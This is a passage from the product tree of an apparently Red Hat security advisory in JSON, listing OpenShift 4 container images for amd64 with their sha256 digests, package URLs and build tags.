"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9-operator@sha256%3A0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557684"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-workload-identity-webhook-rhel9@sha256%3A4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3Aa212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3Ad94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3Ad9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Ae53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Ab2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3A96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3A4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3A0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3Acf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3Add57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3Ab654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3Abce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3Afe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3Add3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3Ac805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
